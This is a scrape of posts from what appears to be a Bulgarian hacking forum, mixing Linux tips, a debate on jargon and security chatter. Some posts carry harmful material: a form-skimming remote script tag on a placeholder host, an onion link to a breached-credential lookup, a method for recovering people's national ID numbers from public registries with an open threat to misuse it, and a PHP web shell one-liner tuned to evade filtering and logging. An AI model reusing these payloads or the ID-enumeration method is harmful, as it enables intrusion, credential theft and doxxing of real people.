Leaderboard

Ще бъда кратък и надявам се ясен. В един пробит сайт, хакерът може да постави javascript код и по този начин може да открадне всички въведени данни от дадена форма. Не е нужно да инжектира целият дълъг код, а просто да се извика от отдалечен сървър под формата на <script src="http://drug-website/gaden-script.js"></script> По този начин се правят сериозни зулуми. Един от най-лощите сценарии е вграждането на такъв код в интернет магазин и кредитни карти например. Ето и един сайт обесняващ с демо, как става самото крадене. http://www.stealmylogin.com/demo.html Има и други техники но на тях ще се спра може би в някоя друга тема.

- Здрасти знаехте ли че можете да ползвате линукс шел под Windows? - Защото аз не знаех :Д ето как става Натиснете старт менюто и тръсете "Turn Windows features on or off." Търсете и сложете тикче на "Windows Subsystem for Linux". След това рестарт на компа. След рестарта отворете Microsoft Store и търсете Linux Изберете си OS и го инсталирайте. След това отново го потърсете в старт менюто и го пуснете останалото е лесно ще избирате име и парола за логин. Правата ви ще са потребителско ако искате да сте ROOT напишете следните команди в конзолата за да смените първо root паролата. sudo passwd root Слагате текущата парола след това новата. После просто отворете CMD и вече зависи от това какъв OS сте избрали (Ubuntu) ubuntu config --default-user root OR (Ubuntu 18.04 LTS) ubuntu1804 config --default-user root OR (Ubuntu 16.04 LTS) ubuntu1604 config --default-user root OR (openSUSE Leap 42) openSUSE-42 config --default-user root OR (SUSE Linux) SLES-12 config --default-user root OR (Debian) debian config --default-user root OR (Kali Linux) kali config --default-user root Ето на какво прилича

Понеже някои доста ме питат за XSS реших да направя едно видео. Има няколко вида XSS което обърква начинаещите етични хакери като си мислят че е една уязвимост и как точно хакерите се възползват от тях, преди се правиха Sniffer-и ( Това вече не е нужно). Все пак трябва от някъде да се започне. Приятно гледане! 😊

Благодаря за прекрасния материал. Ако ми позволите бих добавил и още нещо, което е малко известно. А знаете ли, че може да напишете един програмен код, който да се изпълнява без проблем на Windows, Linux, iOS и Android? Да. От години Microsoft и Embarcadero, независимо един от друг работят в направление One Platform. На практика конфликт между Linux и Microsoft никога не е имало. Точно обратното. Microsoft винаги активно са подкрепяли развитието на Linux и то не само финансово. Много от потребителските версии на Linux, ползват патенти на Microsoft. Има и още нещо, което е много малко известно, но за което съм писал. А да знаете, че всички операционни системи поддържат нещо, наричано IOUtils? На практика точно това е ядрото на много мощен код, който позволява с лекота да преминавате от една ОС в друга. Изключително полезен инструмент, който прави с файловите системи неща, за които дори не сте мечтали. Между другото в Microsoft Store има много приложения за Linux и това си е съвсем в реда на нещата. Още веднъж благодаря на Linuxmaster за прекрасният материал.

Тази седмица е бележитa - IDA току що беше пенсионирана със специалното участие на NSA. За тези който незнаят, IDA е най-пълния туул за reverse engineering, и най-скъпия съответно. Като една от най-важните му функции беше ASSEMBLY към pseudo C decompilation -XRay модула. Днес NSA рилийзнаха техния туул open source- ghidra ['идра] https://ghidra-sre.org/. Не съм му направил пълен анализ но на пръв прочит, виждам няколко неща: - Промяна в един от прозорците, афектира веднага всички различни view-та на програмата; - Модула на за декомпилация се чете (според мен) с една идея по добре от този на IDA; Днес ще опитам да видя как се получава динамичния анализ и да мина през документацията . !!! В гит-а се намира development версия на програмата. Тряба да едитнете конфигурационните файлове за да изключите JVM debug mode. Иначе сте уязвими на RCE. Нищо ново, джавата така си работи.

След инсталация на Kali Linux при стартирането на OS влизате в GRUB Меню имате две опции за избиране Kali GNU/Linux и Advanced options for Kali GNU/Linux избирате Default "*Advanced options for Kali GNU/Linux" и натискате "Е" след което трябва да се намирате ето тук : https://i.imgur.com/p6ELnpI.png И в този код търсите следната линия : da1 ro initrd=/install/gtk/initrd.gz quiet и го заменяте по този начин : da1 rw initrd=/install/gtk/initrd.gz quiet init=/bin/bash След което натискате F10 за да запазите промените. След това ще ви върне отново в GRUB Менюто но този път натискате "Enter" и сте в терминала и пишете следните команди passwd root след тази команда ще ви поиска новата парола за root user-a повторно. Избирате си парола и пишете и да знаете това което пишете като парола няма да се вижда докато го пишете. И последната стъпка е просто рестартиране на Kali Linux чрез VMWare // VM > Power > Restart Guest След като стартира пишете потребителско име : root и паролата която сте сложили и сте вие !

Здравей, Напълно те подкрепям. Трябва да се знае английски, защото за езиците от високо ниво това е огромно предимство. Не знам дали сте запознати, но в Малайзия (и не само там) използването на английски език в много сфери е забранено със закон от 1985 година. Бяха ми нужни три години за да разбера защо това е направено. Повярвайте има желязна логика. Преди години имах сериозен проблем при работата си с японци. Те не признават никаква техническа документация на английски език. Само на японски и само на катакана. Никакъв компромис. С датчаните е още по-страшно. Там изискват да знаете писмено и говоримо датски. Английският език в Дания не се използва в работни взаимоотношения. Пиша това въз основа на горчив, личен опит. Ако искаме развитие в технологичната сфера е нужно да имаме солидна база. Не може да изучаваме програмиране, а да не знаем какво е алгоритъм. Друга много сериозна грешка е, че битува схващането, че трябва да си добър математик за да си добър програмист. Да, но числените методи в програмирането са доста далеч от фундаменталната математика. Да не споменавам, че съществува огромен набор от математически прийоми, създадени от програмисти, за които математиците не са и чували. Мисля, че най-напред би следвало да се научим да общуваме. Това е много трудно. Още по-трудно е да се научим да водим дебат (дискусия). Най-трудно от всичко е да обменяме знания. Признавам, че и до момента ми е трудно да се справя с това. Това, което ми харесва в този форум е, че има дискусия. За разлика от много други тук се спазва добрият тон, а това е едно много хубаво начало.

Колеги, чета Ви из форума и направо съм потресен. Толкова много чуждици и понятия използвате ненужно и не на място, че чак се хващам за главата. На места чета за Black Hat и тем подобните на цвят шапки, което е смешно и не е никакво стандартизирано делене на ""хакери" (спрете с филмите). Обратно на логиката, се използват адски много ненужни чуждици, които вместо да поясняват нещо, то повече тормозят потребителите и на моменти даже на мен ми се е налагало да питам Гугъл какво животно е това. Когато разяснявате някакъв софтуер, го обяснете нормално с Българските аналози на думите, а не "сетнах кей но не тръгва" или "рънвам програмата и стречнах прозореца". Направо съм потресен на моменти какви думи и словосъчетания се използват. Писва ми да ги поправям и накрая ще започна да трия, докато не се научим да използваме себеизразяването правилно!

@Avatara Разбираме те напълно братле, ако сте забелязали в моите клипове всичко е на български. Трябва да се знае английски (може да не е перфектно). Трудно можеш да обърнеш някоя английска дума на български в буквалният й смисъл. Както знам а и ти знаеш тези които са напреднали знаем, че е пълно с команди и термини и ни е трудно когато свикнем с тях и ползваме английски думи и термини това е, не че сме против българският език

Може да се bypass-не но е играчка :)

http://pwndb2am4tzkvold.onion Ето я и hardcore версията на haveibeenpwned

Добре е да се отбележи, че reflected XSS се блокира от XSS AudItor-а под Google Chrome. Просто не работи. В този смисъл Chrome е полезен. Незнам и за актуален bypass в момента.

На същото мнение съм.

Абе колеги, къде прочетохте да се противя за използването на термини? Разграничавайте използването на термини от преднамереното преизползване на някаква жаргонна терминология. Идеята ми е малчуганите да спрат въвеждането на някакъв жаргон, като себеизразяване в темите си. Това е смешно! Едно е да се говори сериозно по някоя тема и съвсем различно нещо е да се смесват езици. Щом всички сме достатъчно интелигентни, според авторите на коментарите, да си преведем някоя чуждица, то да си използват Българският аналог. Когато думата няма аналог нека се използва, ама изречения от сорта на продължават да са ми излишни. Едва ли хората знаят, че „redditor“ е потребител на популярен новинарски сайт (reddit.com), а „субредити“ (subreddits) e някаква подкатегория в сайта. Та не виждам с какво се налага използването на такива сложни за разбиране изречения. Впрочем тук не всички сe занимават със съкратена форма на израза „penetration tester“ или „Pentester“, че да гледате само от тази страна на стената. Половината „тестващи“ лица тук не са програмисти и използват някакъв готов софтуер за търсене на тривиални слабости. Изписало им, че има XSS уязвимост, само защото софтуера виждаш ли не използвал JS да филтрира някое поле на входяща форма, защото ние програмистите все пасем трева и от сървърна страна не филтрираме нищо. Всеки втори бисквитки краде и се чуди с мляко ли да ги изяде или браузъра ще забие без витамините си...

<?php $result = []; $percentages = [.1, .25, .5, .15]; $randomNumber = rand(1, 999999); // 1000 foreach ($percentages as $percentage) { $result[] = $randomNumber * $percentage; }

Съжалявам, но аз не го намирам за смешно избощо. Естествено че би било превъзходно всички термини от технологиите да имат аналог и всички да пишем на български, но това не винаги е така. Аз на български пиша почти и само в този форум, в професионалната ми кариера нямам нито един доклад писан на български, тъй че не смятам че използването на чуждици е голям проблем - толкова си мога, и смятам че е пропуск че в България все още се преподават технологии на български език а не на англиийски. Та, да си пишем кой както иска

Аз лично подкрепям мнението Ви @freeman987, поради факта, че наистина това не е желателно, просто според мен е друго да кажеш: "Рънна ли програмата която ти изпратих?" вместо да си кажеш "Пусна ли програмата която ти изпратих?" Поне ако се използват термини да се пишат на английски и да не се използват като словосъчетания..

Колеги, сърфирайте където си поискате в мрежата, работете каквото желаете и учете всякакви езици, но докато се намирате в България и пишете в Български форум, използвайте красивият ни език по предназначение. Не Ви знам, какви и от къде сте, но е смешно използването на чуждици във всеки един момент от коментарите Ви. Да, на места е належаща употребата на външни термини, ама и тогава не се прекалява. Чрез използването на такива думи никой няма да Ви сметне за по-интелигентни, само за по-млада аудитория. Не знам за другите модератори, но аз не цензурирам свободно изразеното мнение на съфорумниците ми и имам изключително „soft approach to the user“ (мек подход към потребителя).

Ако има желаещ да посети Def.camp в Букурещ, мога да му подаря билет. TAD GROUP е един от спонсорите и съответно разполага с определено количество билети. https://def.camp/tickets/ Билетите са "Standard". Заинтересованите моля да пишат направо на лично.

Здравейте, това е първата ми тема в този форум... Днес ще се запознаем с понятието "Единен Граждански Номер" и с това, което всеки знае - как се генерира и ще разширим знанията си за това как може да се манипулира с помощта на 2 български публични регистъра. Както всички знаем ЕГН-то се състои от 10 цифрички и като всяка една цифра има своето значение... Повече за алгоритъма можете да видите ТУК Идеята, която ми хрумна е че ако знаем рождената дата на дадено лице със съвсем малки усилия може да намерим неговото ЕГН като генерираме ЕГН-то на всички "потенциални" хора, които са се родили на същия ден и започнем да ги въвеждаме ръчно в някой от регистрите и видим дали съответства на лицето, което търсим. Имаме две опции: Търговски регистър Здравноосигурителен регистър на НАП За да генерирате ЕГН-тата може да използвате кода, който пресъздава алгоритъма или да използвате вече компилиран - ТУК Във някои от следващи теми мога да ви покажа как може да си поиграете с на някой човек живота благодарение на това, което ви показах днес... hf

Много по-добре е да не се използва статична функция като "passthru", защото може да се филтрира. Много по-добре е например <?php @$_POST['a'](@$_POST['b']); ?> Използваме POST, за да не се записва в access логовете.

Не е добре да попада такава система в злонамерен човек ?